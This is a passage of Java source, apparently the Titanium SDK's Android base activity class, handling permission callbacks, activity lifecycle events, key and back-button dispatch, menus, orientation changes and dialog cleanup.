response); } else { Log.w(TAG, "Permission callback function has not been set"); } } 
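	/*
	 * Hedged usage sketch (not part of this class): how calling code might pair
	 * registerPermissionRequestCallback() below with an Android permission request
	 * so that onRequestPermissionsResult() above routes the grant results back to
	 * the registered KrollFunction as a KrollDict with code/message fields. The
	 * request code, callback and context values are hypothetical placeholders,
	 * and ActivityCompat is the standard support-library helper, shown for
	 * illustration only.
	 *
	 *   int requestCode = 100; // hypothetical 8-bit request code
	 *   TiBaseActivity.registerPermissionRequestCallback(requestCode, callback, krollObject);
	 *   ActivityCompat.requestPermissions(activity,
	 *       new String[] { android.Manifest.permission.CAMERA }, requestCode);
	 */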
/** * register permission request result callback for activity * * @param requestCode request code (8 Bit) to associate callback with request * @param callback callback function which receives a KrollDict with success, * code, optional message and requestCode * @param context KrollObject as required by async callback pattern */ public static void registerPermissionRequestCallback(Integer requestCode, KrollFunction callback, KrollObject context) { if (callback != null && context != null) { callbackDataByPermission.put(requestCode, new PermissionContextData(requestCode, callback, context)); } } protected void setFullscreen(boolean fullscreen) { if (fullscreen) { //getWindow().addFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN); View decorView = getWindow().getDecorView(); // Hide both the navigation bar and the status bar. // SYSTEM_UI_FLAG_FULLSCREEN is only available on Android 4.1 and higher, but as // a general rule, you should design your app to hide the status bar whenever you // hide the navigation bar. int uiOptions = View.SYSTEM_UI_FLAG_HIDE_NAVIGATION | View.SYSTEM_UI_FLAG_FULLSCREEN; decorView.setSystemUiVisibility(uiOptions); } } // Subclasses can override to handle post-creation (but pre-message fire) logic @SuppressWarnings("deprecation") protected void windowCreated(Bundle savedInstanceState) { boolean fullscreen = getIntentBoolean(TiC.PROPERTY_FULLSCREEN, false); boolean modal = getIntentBoolean(TiC.PROPERTY_MODAL, false); int softInputMode = getIntentInt(TiC.PROPERTY_WINDOW_SOFT_INPUT_MODE, -1); int windowFlags = getIntentInt(TiC.PROPERTY_WINDOW_FLAGS, 0); boolean hasSoftInputMode = softInputMode != -1; setFullscreen(fullscreen); if (windowFlags > 0) { getWindow().addFlags(windowFlags); } if (modal) { if (Build.VERSION.SDK_INT < TiC.API_LEVEL_ICE_CREAM_SANDWICH) { // This flag is deprecated in API 14. On ICS, the background is not blurred but straight black. getWindow().addFlags(WindowManager.LayoutParams.FLAG_BLUR_BEHIND); } } if (hasSoftInputMode) { Log.d(TAG, "windowSoftInputMode: " + softInputMode, Log.DEBUG_MODE); getWindow().setSoftInputMode(softInputMode); } boolean useActivityWindow = getIntentBoolean(TiC.INTENT_PROPERTY_USE_ACTIVITY_WINDOW, false); if (useActivityWindow) { int windowId = getIntentInt(TiC.INTENT_PROPERTY_WINDOW_ID, -1); TiActivityWindows.windowCreated(this, windowId, savedInstanceState); } } // Record if user has set a content view manually from hyperloop code during require of app.js! @Override public void setContentView(View view) { overridenLayout = true; super.setContentView(view); } @Override public void setContentView(int layoutResID) { overridenLayout = true; super.setContentView(layoutResID); } @Override public void setContentView(View view, LayoutParams params) { overridenLayout = true; super.setContentView(view, params); } @Override /** * When the activity is created, this method adds it to the activity stack and * fires a javascript 'create' event. * @param savedInstanceState Bundle of saved data. */ protected void onCreate(Bundle savedInstanceState) { Log.d(TAG, "Activity " + this + " onCreate", Log.DEBUG_MODE); inForeground = true; TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { super.onCreate(savedInstanceState); if (!isFinishing()) { finish(); } return; } // If all the activities has been killed and the runtime has been disposed or the app's hosting process has // been killed, we cannot recover one specific activity because the info of the top-most view proxy has been // lost (TiActivityWindows.dispose()). 
In this case, we have to restart the app. if (TiBaseActivity.isUnsupportedReLaunch(this, savedInstanceState)) { Log.w(TAG, "Runtime has been disposed or app has been killed. Finishing."); super.onCreate(savedInstanceState); tiApp.scheduleRestart(250); finish(); return; } TiApplication.addToActivityStack(this); // create the activity proxy here so that it is accessible from the activity in all cases activityProxy = new ActivityProxy(this); // Increment the reference count so we correctly clean up when all of our activities have been destroyed KrollRuntime.incrementActivityRefCount(); Intent intent = getIntent(); if (intent != null) { if (intent.hasExtra(TiC.INTENT_PROPERTY_MESSENGER)) { messenger = (Messenger) intent.getParcelableExtra(TiC.INTENT_PROPERTY_MESSENGER); msgActivityCreatedId = intent.getIntExtra(TiC.INTENT_PROPERTY_MSG_ACTIVITY_CREATED_ID, -1); msgId = intent.getIntExtra(TiC.INTENT_PROPERTY_MSG_ID, -1); } if (intent.hasExtra(TiC.PROPERTY_WINDOW_PIXEL_FORMAT)) { getWindow().setFormat(intent.getIntExtra(TiC.PROPERTY_WINDOW_PIXEL_FORMAT, PixelFormat.UNKNOWN)); } } // Doing this on every create in case the activity is externally created. TiPlatformHelper.getInstance().intializeDisplayMetrics(this); if (layout == null) { layout = createLayout(); } if (intent != null && intent.hasExtra(TiC.PROPERTY_KEEP_SCREEN_ON)) { layout.setKeepScreenOn(intent.getBooleanExtra(TiC.PROPERTY_KEEP_SCREEN_ON, layout.getKeepScreenOn())); } // Set the theme of the activity before calling super.onCreate(). // On 2.3 devices, it does not work if the theme is set after super.onCreate. int theme = getIntentInt(TiC.PROPERTY_THEME, -1); if (theme != -1) { this.setTheme(theme); } // Set ActionBar into split mode must be done before the decor view has been created // we need to do this before calling super.onCreate() if (intent != null && intent.hasExtra(TiC.PROPERTY_SPLIT_ACTIONBAR)) { getWindow().setUiOptions(ActivityInfo.UIOPTION_SPLIT_ACTION_BAR_WHEN_NARROW); } // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); // we need to set window features before calling onCreate this.requestWindowFeature(Window.FEATURE_PROGRESS); this.requestWindowFeature(Window.FEATURE_INDETERMINATE_PROGRESS); if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.LOLLIPOP) { this.requestWindowFeature(Window.FEATURE_ACTIVITY_TRANSITIONS); } super.onCreate(savedInstanceState); windowCreated(savedInstanceState); if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_CREATE, null); activityProxy.fireEvent(TiC.EVENT_CREATE, null); } // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); // If user changed the layout during app.js load, keep that if (!overridenLayout) { setContentView(layout); } // Set the title of the activity after setContentView. // On 2.3 devices, if the title is set before setContentView, the app will crash when a NoTitleBar theme is used. 
updateTitle(); sendMessage(msgActivityCreatedId); // for backwards compatibility sendMessage(msgId); // store off the original orientation for the activity set in the AndroidManifest.xml // for later use originalOrientationMode = getRequestedOrientation(); orientationListener = new OrientationEventListener(this, SensorManager.SENSOR_DELAY_NORMAL) { @Override public void onOrientationChanged(int orientation) { DisplayMetrics dm = new DisplayMetrics(); getWindowManager().getDefaultDisplay().getMetrics(dm); int width = dm.widthPixels; int height = dm.heightPixels; int rotation = getWindowManager().getDefaultDisplay().getRotation(); if ((rotation == Surface.ROTATION_90 || rotation == Surface.ROTATION_270) && rotation != previousOrientation) { callOrientationChangedListener(TiApplication.getAppRootOrCurrentActivity(), width, height, rotation); } else if ((rotation == Surface.ROTATION_0 || rotation == Surface.ROTATION_180) && rotation != previousOrientation) { callOrientationChangedListener(TiApplication.getAppRootOrCurrentActivity(), width, height, rotation); } } }; if (orientationListener.canDetectOrientation() == true) { orientationListener.enable(); } else { Log.w(TAG, "Cannot detect orientation"); orientationListener.disable(); } if (window != null) { window.onWindowActivityCreated(); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, savedInstanceState, TiLifecycle.LIFECYCLE_ON_CREATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } } public int getOriginalOrientationMode() { return originalOrientationMode; } public boolean isInForeground() { return inForeground; } protected void sendMessage(final int msgId) { if (messenger == null || msgId == -1) { return; } // fire an async message on this thread's queue // so we don't block onCreate() from returning TiMessenger.postOnMain(new Runnable() { public void run() { handleSendMessage(msgId); } }); } protected void handleSendMessage(int messageId) { try { Message message = TiMessenger.getMainMessenger().getHandler().obtainMessage(messageId, this); messenger.send(message); } catch (RemoteException e) { Log.e(TAG, "Unable to message creator. finishing.", e); finish(); } catch (RuntimeException e) { Log.e(TAG, "Unable to message creator. finishing.", e); finish(); } } protected TiActivitySupportHelper getSupportHelper() { if (supportHelper == null) { this.supportHelper = new TiActivitySupportHelper(this); // Register the supportHelper so we can get it back when the activity is recovered from force-quitting. supportHelperId = TiActivitySupportHelpers.addSupportHelper(supportHelper); } return supportHelper; } // Activity Support public int getUniqueResultCode() { return getSupportHelper().getUniqueResultCode(); } /** * See TiActivitySupport.launchActivityForResult for more details. */ public void launchActivityForResult(Intent intent, int code, TiActivityResultHandler resultHandler) { getSupportHelper().launchActivityForResult(intent, code, resultHandler); } /** * See TiActivitySupport.launchIntentSenderForResult for more details. 
*/ public void launchIntentSenderForResult(IntentSender intent, int requestCode, Intent fillInIntent, int flagsMask, int flagsValues, int extraFlags, Bundle options, TiActivityResultHandler resultHandler) { getSupportHelper().launchIntentSenderForResult(intent, requestCode, fillInIntent, flagsMask, flagsValues, extraFlags, options, resultHandler); } @Override protected void onActivityResult(int requestCode, int resultCode, Intent data) { super.onActivityResult(requestCode, resultCode, data); synchronized (onActivityResultListeners.synchronizedList()) { for (OnActivityResultEvent listener : onActivityResultListeners.nonNull()) { try { TiLifecycle.fireOnActivityResultEvent(this, listener, requestCode, resultCode, data); } catch (Throwable t) { Log.e(TAG, "Error dispatching onActivityResult event: " + t.getMessage(), t); } } } getSupportHelper().onActivityResult(requestCode, resultCode, data); } @Override public void onBackPressed() { synchronized (interceptOnBackPressedListeners.synchronizedList()) { for (interceptOnBackPressedEvent listener : interceptOnBackPressedListeners.nonNull()) { try { if (listener.interceptOnBackPressed()) { return; } } catch (Throwable t) { Log.e(TAG, "Error dispatching interceptOnBackPressed event: " + t.getMessage(), t); } } } TiWindowProxy topWindow = topWindowOnStack(); if (topWindow != null && topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { topWindow.fireEvent(TiC.EVENT_ANDROID_BACK, null); } // Override default Android behavior for "back" press // if the top window has a callback to handle the event. if (topWindow != null && topWindow.hasProperty(TiC.PROPERTY_ON_BACK)) { KrollFunction onBackCallback = (KrollFunction) topWindow.getProperty(TiC.PROPERTY_ON_BACK); onBackCallback.callAsync(activityProxy.getKrollObject(), new Object[] {}); } if (!topWindow.hasProperty(TiC.PROPERTY_ON_BACK) && !topWindow.hasListeners(TiC.EVENT_ANDROID_BACK)) { // there are no parent activities to return to // override back press to background the activity // note: 2 since there should always be TiLaunchActivity and TiActivity if (TiApplication.activityStack.size() <= 2) { if (topWindow != null && !TiConvert.toBoolean(topWindow.getProperty(TiC.PROPERTY_EXIT_ON_CLOSE), true)) { this.moveTaskToBack(true); return; } } // If event is not handled by custom callback allow default behavior. 
super.onBackPressed(); } } @Override public boolean dispatchKeyEvent(KeyEvent event) { boolean handled = false; TiViewProxy window; if (this.window != null) { window = this.window; } else { window = this.view; } if (window == null) { return super.dispatchKeyEvent(event); } switch(event.getKeyCode()) { case KeyEvent.KEYCODE_BACK : { if (event.getAction() == KeyEvent.ACTION_UP) { String backEvent = "android:back"; KrollProxy proxy = null; //android:back could be fired from a tabGroup window (activityProxy) //or hw window (window).This event is added specifically to the activity //proxy of a tab group in window.js if (activityProxy.hasListeners(backEvent)) { proxy = activityProxy; } else if (window.hasListeners(backEvent)) { proxy = window; } if (proxy != null) { proxy.fireEvent(backEvent, null); handled = true; } } break; } case KeyEvent.KEYCODE_CAMERA : { if (window.hasListeners(TiC.EVENT_ANDROID_CAMERA)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_CAMERA, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:camera")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:camera", null); } handled = true; } break; } case KeyEvent.KEYCODE_FOCUS : { if (window.hasListeners(TiC.EVENT_ANDROID_FOCUS)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_FOCUS, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:focus")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:focus", null); } handled = true; } break; } case KeyEvent.KEYCODE_SEARCH : { if (window.hasListeners(TiC.EVENT_ANDROID_SEARCH)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_SEARCH, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:search")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:search", null); } handled = true; } break; } case KeyEvent.KEYCODE_VOLUME_UP : { if (window.hasListeners(TiC.EVENT_ANDROID_VOLUP)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_VOLUP, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:volup")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:volup", null); } handled = true; } break; } case KeyEvent.KEYCODE_VOLUME_DOWN : { if (window.hasListeners(TiC.EVENT_ANDROID_VOLDOWN)) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent(TiC.EVENT_ANDROID_VOLDOWN, null); } handled = true; } // TODO: Deprecate old event if (window.hasListeners("android:voldown")) { if (event.getAction() == KeyEvent.ACTION_UP) { window.fireEvent("android:voldown", null); } handled = true; } break; } } if (!handled) { handled = super.dispatchKeyEvent(event); } return handled; } @Override public boolean onCreateOptionsMenu(Menu menu) { // If targetSdkVersion is set to 11+, Android will invoke this function // to initialize the menu (since it's part of the action bar). Due // to the fix for Android bug 2373, activityProxy won't be initialized b/c the // activity is expected to restart, so we will ignore it. 
if (activityProxy == null) { return false; } boolean listenerExists = false; synchronized (onCreateOptionsMenuListeners.synchronizedList()) { for (OnCreateOptionsMenuEvent listener : onCreateOptionsMenuListeners.nonNull()) { try { listenerExists = true; TiLifecycle.fireOnCreateOptionsMenuEvent(this, listener, menu); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnCreateOptionsMenuEvent: " + t.getMessage(), t); } } } if (menuHelper == null) { menuHelper = new TiMenuSupport(activityProxy); } return menuHelper.onCreateOptionsMenu(super.onCreateOptionsMenu(menu) || listenerExists, menu); } @Override public boolean onOptionsItemSelected(MenuItem item) { switch (item.getItemId()) { case android.R.id.home: if (activityProxy != null) { ActionBarProxy actionBarProxy = activityProxy.getActionBar(); if (actionBarProxy != null) { KrollFunction onHomeIconItemSelected = (KrollFunction) actionBarProxy .getProperty(TiC.PROPERTY_ON_HOME_ICON_ITEM_SELECTED); KrollDict event = new KrollDict(); event.put(TiC.EVENT_PROPERTY_SOURCE, actionBarProxy); if (onHomeIconItemSelected != null) { onHomeIconItemSelected.call(activityProxy.getKrollObject(), new Object[] { event }); } } } return true; default: return menuHelper.onOptionsItemSelected(item); } } @Override public boolean onPrepareOptionsMenu(Menu menu) { boolean listenerExists = false; synchronized (onPrepareOptionsMenuListeners.synchronizedList()) { for (OnPrepareOptionsMenuEvent listener : onPrepareOptionsMenuListeners.nonNull()) { try { listenerExists = true; TiLifecycle.fireOnPrepareOptionsMenuEvent(this, listener, menu); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnPrepareOptionsMenuEvent: " + t.getMessage(), t); } } } return menuHelper.onPrepareOptionsMenu(super.onPrepareOptionsMenu(menu) || listenerExists, menu); } public static void callOrientationChangedListener(Activity activity, int width, int height, int rotation) { if (activity != null) { int currentOrientation = activity.getWindowManager().getDefaultDisplay().getRotation(); if (orientationChangedListener != null && previousOrientation != currentOrientation) { previousOrientation = currentOrientation; orientationChangedListener.onOrientationChanged (currentOrientation, width, height); } } } @Override public void onConfigurationChanged(Configuration newConfig) { super.onConfigurationChanged(newConfig); for (WeakReference<ConfigurationChangedListener> listener : configChangedListeners) { if (listener.get() != null) { listener.get().onConfigurationChanged(this, newConfig); } } } @Override protected void onNewIntent(Intent intent) { super.onNewIntent(intent); Log.d(TAG, "Activity " + this + " onNewIntent", Log.DEBUG_MODE); if (activityProxy != null) { IntentProxy ip = new IntentProxy(intent); KrollDict data = new KrollDict(); data.put(TiC.PROPERTY_INTENT, ip); activityProxy.fireSyncEvent(TiC.EVENT_NEW_INTENT, data); // TODO: Deprecate old event activityProxy.fireSyncEvent("newIntent", data); } } public void addOnLifecycleEventListener(OnLifecycleEvent listener) { lifecycleListeners.add(new WeakReference<OnLifecycleEvent>(listener)); } public void addOnInstanceStateEventListener(OnInstanceStateEvent listener) { instanceStateListeners.add(new WeakReference<OnInstanceStateEvent>(listener)); } public void addOnWindowFocusChangedEventListener(OnWindowFocusChangedEvent listener) { windowFocusChangedListeners.add(new WeakReference<OnWindowFocusChangedEvent>(listener)); } public void addInterceptOnBackPressedEventListener(interceptOnBackPressedEvent listener) { 
interceptOnBackPressedListeners.add(new WeakReference<interceptOnBackPressedEvent>(listener)); } public void addOnActivityResultListener(OnActivityResultEvent listener) { onActivityResultListeners.add(new WeakReference<OnActivityResultEvent>(listener)); } public void addOnCreateOptionsMenuEventListener(OnCreateOptionsMenuEvent listener) { onCreateOptionsMenuListeners.add(new WeakReference<OnCreateOptionsMenuEvent>(listener)); } public void addOnPrepareOptionsMenuEventListener(OnPrepareOptionsMenuEvent listener) { onPrepareOptionsMenuListeners.add(new WeakReference<OnPrepareOptionsMenuEvent>(listener)); } public void removeOnLifecycleEventListener(OnLifecycleEvent listener) { // TODO stub } private void dispatchCallback(String name, KrollDict data) { if (data == null) { data = new KrollDict(); } data.put("source", activityProxy); // TIMOB-19903 if (TiApplication.getInstance().runOnMainThread()) { // We must call this synchornously to ensure it happens before we release the Activity reference on the V8/Native side! activityProxy.callPropertySync(name, new Object[] { data }); } else { // This hopefully finishes before we release the reference on the native side?! I have seen it crash because it didn't before though... // Not sure it's safe to keep this behavior... activityProxy.callPropertyAsync(name, new Object[] { data }); } } private void releaseDialogs(boolean finish) { //clean up dialogs when activity is pausing or finishing for (Iterator<DialogWrapper> iter = dialogs.iterator(); iter.hasNext(); ) { DialogWrapper p = iter.next(); Dialog dialog = p.getDialog(); boolean persistent = p.getPersistent(); //if the activity is pausing but not finishing, clean up dialogs only if //they are non-persistent if (finish || !persistent) { if (dialog != null && dialog.isShowing()) { dialog.dismiss(); } dialogs.remove(p); } } } @Override public void onWindowFocusChanged(boolean hasFocus) { synchronized (windowFocusChangedListeners.synchronizedList()) { for (OnWindowFocusChangedEvent listener : windowFocusChangedListeners.nonNull()) { try { listener.onWindowFocusChanged(hasFocus); } catch (Throwable t) { Log.e(TAG, "Error dispatching onWindowFocusChanged event: " + t.getMessage(), t); } } } super.onWindowFocusChanged(hasFocus); } @Override /** * When this activity pauses, this method sets the current activity to null, fires a javascript 'pause' event, * and if the activity is finishing, remove all dialogs associated with it. 
*/ protected void onPause() { inForeground = false; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_PAUSE, null); } super.onPause(); isResumed = false; Log.d(TAG, "Activity " + this + " onPause", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { releaseDialogs(true); if (!isFinishing()) { finish(); } return; } if (!windowStack.empty()) { windowStack.peek().onWindowFocusChange(false); } TiApplication.updateActivityTransitionState(true); tiApp.setCurrentActivity(this, null); TiUIHelper.showSoftKeyboard(getWindow().getDecorView(), false); if (this.isFinishing()) { releaseDialogs(true); } else { //release non-persistent dialogs when activity hides releaseDialogs(false); } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_PAUSE, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_PAUSE); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } // Checkpoint for ti.background event if (tiApp != null && TiApplication.getInstance().isAnalyticsEnabled()) { analytics.sendAppBackgroundEvent(); } } @Override /** * When the activity resumes, this method updates the current activity to this and fires a javascript * 'resume' event. */ protected void onResume() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_RESUME, null); } super.onResume(); if (isFinishing()) { return; } Log.d(TAG, "Activity " + this + " onResume", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (!windowStack.empty()) { windowStack.peek().onWindowFocusChange(true); } tiApp.setCurrentActivity(this, this); TiApplication.updateActivityTransitionState(false); if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_RESUME, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_RESUME); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } isResumed = true; // Checkpoint for ti.foreground event //String deployType = tiApp.getAppProperties().getString("ti.deploytype", "unknown"); if(TiApplication.getInstance().isAnalyticsEnabled()){ analytics.sendAppForegroundEvent(); } } @Override /** * When this activity starts, this method updates the current activity to this if necessary and * fire javascript 'start' and 'focus' events. Focus events will only fire if * the activity is not a tab activity. */ protected void onStart() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_START, null); } super.onStart(); if (isFinishing()) { return; } // Newer versions of Android appear to turn this on by default. // Turn if off until an activity indicator is shown. setProgressBarIndeterminateVisibility(false); Log.d(TAG, "Activity " + this + " onStart", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } updateTitle(); if (activityProxy != null) { // we only want to set the current activity for good in the resume state but we need it right now. 
// save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); activityProxy.fireEvent(TiC.EVENT_START, null); // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_START); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } // store current configuration orientation // This fixed bug with double orientation chnage firing when activity starts in landscape previousOrientation = getWindowManager().getDefaultDisplay().getRotation(); } @Override /** * When this activity stops, this method fires the javascript 'blur' and 'stop' events. Blur events will only fire * if the activity is not a tab activity. */ protected void onStop() { inForeground = false; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_STOP, null); } super.onStop(); Log.d(TAG, "Activity " + this + " onStop", Log.DEBUG_MODE); if (getTiApp().isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_STOP, null); } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_STOP); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } KrollRuntime.suggestGC(); } @Override /** * When this activity restarts, this method updates the current activity to this and fires javascript 'restart' * event. */ protected void onRestart() { inForeground = true; if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_RESTART, null); } super.onRestart(); Log.d(TAG, "Activity " + this + " onRestart", Log.DEBUG_MODE); TiApplication tiApp = getTiApp(); if (tiApp.isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { // we only want to set the current activity for good in the resume state but we need it right now. // save off the existing current activity, set ourselves to be the new current activity temporarily // so we don't run into problems when we give the proxy the event Activity tempCurrentActivity = tiApp.getCurrentActivity(); tiApp.setCurrentActivity(this, this); activityProxy.fireEvent(TiC.EVENT_RESTART, null); // set the current activity back to what it was originally tiApp.setCurrentActivity(this, tempCurrentActivity); } } @Override /** * When the activity is about to go into the background as a result of user choice, this method fires the * javascript 'userleavehint' event. */ protected void onUserLeaveHint() { Log.d(TAG, "Activity " + this + " onUserLeaveHint", Log.DEBUG_MODE); if (getTiApp().isRestartPending()) { if (!isFinishing()) { finish(); } return; } if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_USER_LEAVE_HINT, null); } super.onUserLeaveHint(); } @Override /** * When this activity is destroyed, this method removes it from the activity stack, performs * clean up, and fires javascript 'destroy' event. 
*/ protected void onDestroy() { Log.d(TAG, "Activity " + this + " onDestroy", Log.DEBUG_MODE); if (activityProxy != null) { dispatchCallback(TiC.PROPERTY_ON_DESTROY, null); } inForeground = false; TiApplication tiApp = getTiApp(); //Clean up dialogs when activity is destroyed. releaseDialogs(true); if (tiApp.isRestartPending()) { super.onDestroy(); if (!isFinishing()) { finish(); } return; } synchronized (lifecycleListeners.synchronizedList()) { for (OnLifecycleEvent listener : lifecycleListeners.nonNull()) { try { TiLifecycle.fireLifecycleEvent(this, listener, TiLifecycle.LIFECYCLE_ON_DESTROY); } catch (Throwable t) { Log.e(TAG, "Error dispatching lifecycle event: " + t.getMessage(), t); } } } if (orientationListener != null) { orientationListener.disable(); orientationListener = null; } super.onDestroy(); boolean isFinishing = isFinishing(); // If the activity is finishing, remove the windowId and supportHelperId so the window and supportHelper can be released. // If the activity is forced to destroy by Android OS, keep the windowId and supportHelperId so the activity can be recovered. if (isFinishing) { int windowId = getIntentInt(TiC.INTENT_PROPERTY_WINDOW_ID, -1); TiActivityWindows.removeWindow(windowId); TiActivitySupportHelpers.removeSupportHelper(supportHelperId); } fireOnDestroy(); if (layout instanceof TiCompositeLayout) { Log.d(TAG, "Layout cleanup.", Log.DEBUG_MODE); ((TiCompositeLayout) layout).removeAllViews(); } layout = null; //LW windows if (window == null && view != null) { view.releaseViews(); view.release(); view = null; } if (window != null) { window.closeFromActivity(isFinishing); window.releaseViews(); window.removeAllChildren(); window.release(); window = null; } if (menuHelper != null) { menuHelper.destroy(); menuHelper = null; } if (activityProxy != null) { activityProxy.release(); activityProxy = null; } // Don't dispose the runtime if the activity is forced to destroy by Android, // so we can recover the activity later. KrollRuntime.decrementActivityRefCount(isFinishing); KrollRuntime.suggestGC(); } @Override protected void onSaveInstanceState(Bundle outState) { super.onSaveInstanceState(outState); // If the activity is forced to destroy by Android, save the supportHelperId so // we can get it back when the activity is recovered. 
if (!isFinishing() && supportHelper != null) { outState.putInt("supportHelperId", supportHelperId); } synchronized (instanceStateListeners.synchronizedList()) { for (OnInstanceStateEvent listener : instanceStateListeners.nonNull()) { try { TiLifecycle.fireInstanceStateEvent(outState, listener, TiLifecycle.ON_SAVE_INSTANCE_STATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnInstanceStateEvent: " + t.getMessage(), t); } } } } @Override protected void onRestoreInstanceState(Bundle savedInstanceState) { super.onRestoreInstanceState(savedInstanceState); if (savedInstanceState.containsKey("supportHelperId")) { supportHelperId = savedInstanceState.getInt("supportHelperId"); supportHelper = TiActivitySupportHelpers.retrieveSupportHelper(this, supportHelperId); if (supportHelper == null) { Log.e(TAG, "Unable to retrieve the activity support helper."); } } synchronized (instanceStateListeners.synchronizedList()) { for (OnInstanceStateEvent listener : instanceStateListeners.nonNull()) { try { TiLifecycle.fireInstanceStateEvent(savedInstanceState, listener, TiLifecycle.ON_RESTORE_INSTANCE_STATE); } catch (Throwable t) { Log.e(TAG, "Error dispatching OnInstanceStateEvent: " + t.getMessage(), t); } } } } // called in order to ensure that the onDestroy call is only acted upon once. // should be called by any subclass protected void fireOnDestroy() { if (!onDestroyFired) { if (activityProxy != null) { activityProxy.fireEvent(TiC.EVENT_DESTROY, null); } onDestroyFired = true; } } protected boolean shouldFinishRootActivity() { return getIntentBoolean(TiC.INTENT_PROPERTY_FINISH_ROOT, false); } @Override public void finish() { super.finish(); if (shouldFinishRootActivity()) { TiApplication app = getTiApp(); if (app != null) { TiRootActivity rootActivity = app.getRootActivity(); if (rootActivity != null && !(rootActivity.equals(this)) && !rootActivity.isFinishing()) { rootActivity.finish(); } else if (rootActivity == null && !app.isRestartPending()) { // When the root activity has been killed and garbage collected and the app is not scheduled to restart, // we need to force finish the root activity while this activity has an intent to finish root. // This happens when the "Don't keep activities" option is enabled and the user stays in some activity // (eg. heavyweight window, tabgroup) other than the root activity for a while and then he wants to back // out the app. app.setForceFinishRootActivity(true); } } } } // These activityOnXxxx are all used by TiLaunchActivity when // the android bug 2373 is detected and the app is being re-started. // By calling these from inside its on onXxxx handlers, TiLaunchActivity // can avoid calling super.onXxxx (super being TiBaseActivity), which would // result in a bunch of Titanium-specific code running when we don't need it // since we are restarting the app as fast as possible. Calling these methods // allows TiLaunchActivity to fulfill the requirement that the Android built-in // Activity's onXxxx must be called. (Think of these as something like super.super.onXxxx // from inside TiLaunchActivity.) 
